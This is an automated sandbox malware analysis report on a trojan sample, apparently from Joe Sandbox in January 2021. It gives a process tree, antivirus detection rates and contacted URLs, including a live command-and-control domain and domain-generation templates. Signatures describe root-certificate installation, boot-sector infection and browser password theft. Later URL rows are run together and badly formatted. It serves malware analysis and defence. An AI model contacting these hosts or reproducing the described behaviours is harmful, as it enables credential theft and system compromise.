Default Accounts | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 1 | Peripheral Device Discovery 11 | Remote Desktop Protocol | Man in the Browser 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Browser Extensions 1 | Process Injection 11 | Obfuscated Files or Information 2 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Data from Local System 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Bootkit 1 | Logon Script (Mac) | Install Root Certificate 2 | NTDS | System Information Discovery 157 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Query Registry 2 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | Security Software Discovery 561 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 1 | DCSync | Virtualization/Sandbox Evasion 13 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 13 | Proc Filesystem | Process Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 11 | /etc/passwd and /etc/shadow | Remote System Discovery 11 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Bootkit 1 | Network Sniffing | System Network Configuration Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 346134 | Sample: Cyfj6XGbkd | Start date: 29/01/2021 | Architecture: WINDOWS | Score: 93

Signatures attached to the sample node: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Uses ping.exe to sleep; 3 other signatures

Process tree as drawn in the graph (graph node numbers in brackets; the numbers in parentheses after a process name are the counts shown on that node):

- Cyfj6XGbkd.exe [8] (1 3)
    network: 84cfba021a5a6662.xyz, 104.21.23.16, ports 49725, 49729, 49730 (CLOUDFLARENETUS, United States)
    dropped: C:\Users\user\...\56BB1610C0318054.exe (PE32); C:\...\56BB1610C0318054.exe:Zone.Identifier (ASCII)
    signatures: Installs new ROOT certificates; Contains functionality to infect the boot sector; Registers a new ROOT certificate; 4 other signatures
    - 56BB1610C0318054.exe [15] (26)
        network: 84cfba021a5a6662.xyz; 84CFBA021A5A6662.xyz
        dropped: C:\Users\user\AppData\...\1611970637183.exe (PE32); C:\Users\user\AppData\Local\Temp\xldl.dll (PE32); C:\Users\user\AppData\Local\...\zlib1.dll (PE32); 7 other files (none is malicious)
        signatures: Multi AV Scanner detection for dropped file; Detected unpacking (creates a PE file in dynamic memory); Machine Learning detection for dropped file; 3 other signatures
        - cmd.exe [26]
            - conhost.exe [42]
            - PING.EXE [44]
        - 1611970637183.exe [29] (2)
            network: 192.168.2.1
        - ThunderFW.exe [32] (1)
    - 56BB1610C0318054.exe [20] (1 15)
        network: 84cfba021a5a6662.xyz
        dropped: C:\Users\user\AppData\...\Secure Preferences (UTF-8); C:\Users\user\AppData\Local\...\Preferences (ASCII)
        signatures: Tries to harvest and steal browser information (history, passwords, etc)
        - cmd.exe [34] (1)
            signatures: Uses ping.exe to sleep
            - conhost.exe [46]
            - PING.EXE [48] (1)
        - cmd.exe [36] (1)
            - taskkill.exe [50] (1)
            - conhost.exe [52]
    - cmd.exe [22] (1)
        network: 127.0.0.1
        signatures: Uses ping.exe to sleep
        - conhost.exe [38]
        - PING.EXE [40] (1)
    - msiexec.exe [24] (4)
        dropped: C:\Users\user\AppData\Local\...\MSIDCDD.tmp (PE32)
- msiexec.exe [13]

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Cyfj6XGbkd.exe | 40% | Virustotal |
Cyfj6XGbkd.exe | 24% | Metadefender |
Cyfj6XGbkd.exe | 59% | ReversingLabs | Win32.Trojan.Phonzy
Cyfj6XGbkd.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | 24% | Metadefender |
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | 59% | ReversingLabs | Win32.Trojan.Phonzy
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 8% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\download_user.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\download_user.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\xldl.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\xldl.dll | 0% | ReversingLabs |

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
84CFBA021A5A6662.xyz | 1% | Virustotal |
84cfba021a5a6662.xyz | 1% | Virustotal |

URLs

Long URLs appear truncated in the report. Entries the report lists three times under URL Reputation are shown once and marked as such.

Source | Detection | Scanner | Label
http://84cfba021a5a6662.xyz/info_old/g | 1% | Virustotal |
http://84cfba021a5a6662.xyz/info_old/g | 0% | Avira URL Cloud | safe
http://84cfba021a5a6662.xyz/info_old/e | 0% | Avira URL Cloud | safe
http://84cfba021a5a6662.xyz/info_old/w | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud | safe
https://A5D4CE54CC78B3CA.xyz/ | 0% | Avira URL Cloud | safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js | 0% | Avira URL Cloud | safe
http://84cfba021a5a6662.xyz/info_old/r | 0% | Avira URL Cloud | safe
https://twitter.comsec-fetch-dest: | 0% | Avira URL Cloud | safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z | 0% | Avira URL Cloud | safe
http://ocsp.pki.goog/gts1o1core0 | 0% | URL Reputation (listed 3 times) | safe
http://crl.pki.goog/GTS1O1core.crl0 | 0% | URL Reputation (listed 3 times) | safe
http://84CFBA021A5A6662.xyz/al | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill% | 0% | URL Reputation (listed 3 times) | safe
http://ocsp.pki.goog/GTSGIAG30 | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/llr | 0% | Avira URL Cloud | safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/ | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/llH | 0% | Avira URL Cloud | safe
http://www.youtube.comT | 0% | Avira URL Cloud | safe
http://www.vb-cable.comVBCABLE | 0% | Avira URL Cloud | safe
http://pki.goog/gsr2/GTS1O1.crt0 | 0% | URL Reputation (listed 3 times) | safe
http://ocsp.pki.goog/gsr20 | 0% | URL Reputation (listed 3 times) | safe
http://www.youtube.comf | 0% | Avira URL Cloud | safe
https://pki.goog/repository/0 | 0% | URL Reputation (listed 3 times) | safe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1 | 0% | Avira URL Cloud | safe
http://www.vb-cable.com | 0% | Avira URL Cloud | safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js | 0% | Avira URL Cloud | safe
http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation (listed 3 times) | safe
http://pki.goog/gsr2/GTSGIAG3.crt0) | 0% | Avira URL Cloud | safe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: | 0% | Avira URL Cloud | safe
http://pki.goog/gsr2/GTS1O1.crt0# | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/info_old/ddd | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/info_old/wV | 0% | Avira URL Cloud | safe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info. | 0% | Avira URL Cloud | safe
http://84cfba021a5a6662.xyz/info_old/wI | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/f | 0% | Avira URL Cloud | safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL | 0% | Avira URL Cloud | safe
https://www.instagram.comsec-fetch-mode: | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
84CFBA021A5A6662.xyz | 104.21.23.16 | true | false | | unknown
84cfba021a5a6662.xyz | 104.21.23.16 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://84cfba021a5a6662.xyz/info_old/g | false | Virustotal 1%; Avira URL Cloud: safe | unknown
http://84cfba021a5a6662.xyz/info_old/e | false | Avira URL Cloud: safe | unknown
http://84cfba021a5a6662.xyz/info_old/w | false | Avira URL Cloud: safe | unknown
http://84cfba021a5a6662.xyz/info_old/r | false | Avira URL Cloud: safe | unknown
http://84CFBA021A5A6662.xyz/info_old/ddd | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Long URLs appear truncated in the report.

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate | ecvFEAD.tmp.9.dr | false | | high
https://duckduckgo.com/chrome_newtab | 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.dr | false | | high
https://duckduckgo.com/ac/?q= | 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.dr | false | | high
https://www.messenger.com/ | 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | false | | high
http://www.msn.com | ecvFEAD.tmp.9.dr | false | | high
http://www.nirsoft.net | 1611970637183.exe, 00000009.00000002.384711842.0000000000198000.00000004.00000010.sdmp | false | | high
https://deff.nelreports.net/api/report?cat=msn | ecvFEAD.tmp.9.dr | false | Avira URL Cloud: safe | unknown
https://A5D4CE54CC78B3CA.xyz/ | 56BB1610C0318054.exe, 00000002.00000003.409442821.0000000003810000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/__media__/js/util/nrrV9140.js | ecvFEAD.tmp.9.dr | false | | high
https://twitter.com/ookie: | 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | false | | high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js | ecvFEAD.tmp.9.dr | false | Avira URL Cloud: safe | unknown
https://twitter.comsec-fetch-dest: | 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z | ecvFEAD.tmp.9.dr | false | Avira URL Cloud: safe | unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f | ecvFEAD.tmp.9.dr | false | | high
http://charlesproxy.com/ssl | Cyfj6XGbkd.exe, 00000000.00000002.365655774.000000000089B000.00000004.00000020.sdmp | false | | high
http://ocsp.pki.goog/gts1o1core0 | ecvFEAD.tmp.9.dr | false | URL Reputation: safe (listed 3 times) | unknown
http://www.msn.com/?ocid=iehp | ecvFEAD.tmp.9.dr | false | | high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3 | ecvFEAD.tmp.9.dr | false | | high
http://crl.pki.goog/GTS1O1core.crl0 | ecvFEAD.tmp.9.dr | false | URL Reputation: safe (listed 3 times) | unknown
https://www.messenger.com | 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | false | | high
https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9 | ecvFEAD.tmp.9.dr | false | | high
http://www.nirsoft.net/ | 1611970637183.exe, 1611970637183.exe.2.dr | false | | high
http://84CFBA021A5A6662.xyz/al | 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://forms.real.com/real/realone/download.html?type=rpsp_us | 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmp | false | | high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill% | ecvFEAD.tmp.9.dr | false | URL Reputation: safe (listed 3 times) | unknown
http://ocsp.pki.goog/GTSGIAG30 | ecvFEAD.tmp.9.dr | false | Avira URL Cloud: safe | unknown
https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2 | 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | false | | high
http://84CFBA021A5A6662.xyz/llr | 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N | ecvFEAD.tmp.9.dr | false | Avira URL Cloud: safe | unknown
http://84CFBA021A5A6662.xyz/ | 56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id= | 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | false | | high
https://www.instagram.com/ | 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | false | | high
http://84CFBA021A5A6662.xyz/llH | Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | download_user.dll.2.dr | false | | high
http://www.xunlei.com/GET | download_user.dll.2.dr | false | | high
http://www.youtube.comT | 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee | ecvFEAD.tmp.9.dr | false | | high
http://www.vb-cable.comVBCABLE | Cyfj6XGbkd.exe | false | Avira URL Cloud: safe | unknown
https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c | ecvFEAD.tmp.9.dr | false | | high
https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me | 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | false | | high
https://www.messenger.com/origin: | 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.dr | false | | high
                                                      http://pki.goog/gsr2/GTS1O1.crt0ecvFEAD.tmp.9.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ecvFEAD.tmp.9.drfalse
                                                        high
                                                        https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlecvFEAD.tmp.9.drfalse
                                                          high
                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gecvFEAD.tmp.9.drfalse
                                                            high
                                                            https://contextual.media.net/ecvFEAD.tmp.9.drfalse
                                                              high
                                                              http://ocsp.pki.goog/gsr202ecvFEAD.tmp.9.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.youtube.comf56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookieecvFEAD.tmp.9.drfalse
                                                                high
                                                                https://pki.goog/repository/0ecvFEAD.tmp.9.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1ecvFEAD.tmp.9.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://api.twitter.com/1.1/statuses/update.json56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msnecvFEAD.tmp.9.drfalse
                                                                    high
                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736ecvFEAD.tmp.9.drfalse
                                                                      high
                                                                      https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9ecvFEAD.tmp.9.drfalse
                                                                        high
                                                                        http://www.msn.com/ecvFEAD.tmp.9.drfalse
                                                                          high
                                                                          https://upload.twitter.com/i/media/upload.json56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://www.cloudflare.com/5xx-error-landingCyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.371026243.0000000003813000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376084985.0000000003D38000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734ecvFEAD.tmp.9.drfalse
                                                                                high
                                                                                http://84CFBA021A5A6662.xyz/info_old/r56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpfalse
                                                                                  unknown
                                                                                  https://twitter.com/compose/tweetsec-fetch-mode:56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://84CFBA021A5A6662.xyz/info_old/wCyfj6XGbkd.exe, 00000000.00000002.365614828.0000000000861000.00000004.00000020.sdmp, Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.409330449.0000000003D76000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376093286.0000000003D4D000.00000004.00000001.sdmpfalse
                                                                                      unknown
                                                                                      http://www.vb-cable.comCyfj6XGbkd.exefalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.messenger.com/accept:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804ecvFEAD.tmp.9.drfalse
                                                                                          high
                                                                                          https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3ecvFEAD.tmp.9.drfalse
                                                                                            high
                                                                                            https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.jsecvFEAD.tmp.9.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://contextual.media.net/48/nrrV18753.jsecvFEAD.tmp.9.drfalse
                                                                                              high
                                                                                              https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9ecvFEAD.tmp.9.drfalse
                                                                                                high
                                                                                                http://84CFBA021A5A6662.xyz/info_old/e56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpfalse
                                                                                                  unknown
                                                                                                  http://crl.pki.goog/gsr2/gsr2.crl0?ecvFEAD.tmp.9.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://84CFBA021A5A6662.xyz/info_old/g56BB1610C0318054.exe, 00000002.00000003.391014906.0000000003D78000.00000004.00000001.sdmpfalse
                                                                                                    unknown
                                                                                                    http://pki.goog/gsr2/GTSGIAG3.crt0)ecvFEAD.tmp.9.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=056BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://feedback.googleusercontent.com56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.xunlei.com/download_user.dll.2.drfalse
                                                                                                          high
                                                                                                          http://pki.goog/gsr2/GTS1O1.crt0#ecvFEAD.tmp.9.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://84CFBA021A5A6662.xyz/info_old/wV56BB1610C0318054.exe, 00000004.00000002.377383414.00000000005A6000.00000004.00000020.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/soap/envelope/download_user.dll.2.drfalse
                                                                                                              high
                                                                                                              https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              low
                                                                                                              https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationecvFEAD.tmp.9.drfalse
                                                                                                                high
                                                                                                                http://84cfba021a5a6662.xyz/info_old/wICyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://84cfba021a5a6662.xyz/Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.370858416.00000000007E4000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.377399096.00000000005BB000.00000004.00000020.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsecvFEAD.tmp.9.drfalse
                                                                                                                    high
                                                                                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfecvFEAD.tmp.9.drfalse
                                                                                                                      high
                                                                                                                      http://84CFBA021A5A6662.xyz/f56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://curl.haxx.se/docs/http-cookies.html56BB1610C0318054.exe, 00000002.00000002.414835494.000000000344F000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380176244.000000000330F000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.openssl.org/support/faq.htmldownload_user.dll.2.drfalse
                                                                                                                          high
                                                                                                                          http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tLecvFEAD.tmp.9.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629ecvFEAD.tmp.9.drfalse
                                                                                                                            high
                                                                                                                            https://www.instagram.comsec-fetch-mode:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.instagram.com/accounts/login/ajax/facebook/56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                                              high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.23.16 | unknown | United States | 13335 | CLOUDFLARENETUS | false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 346134
Start date: 29.01.2021
Start time: 17:35:36
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 11s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Cyfj6XGbkd (renamed file extension from none to exe)
Cookbook file name: default.jbs
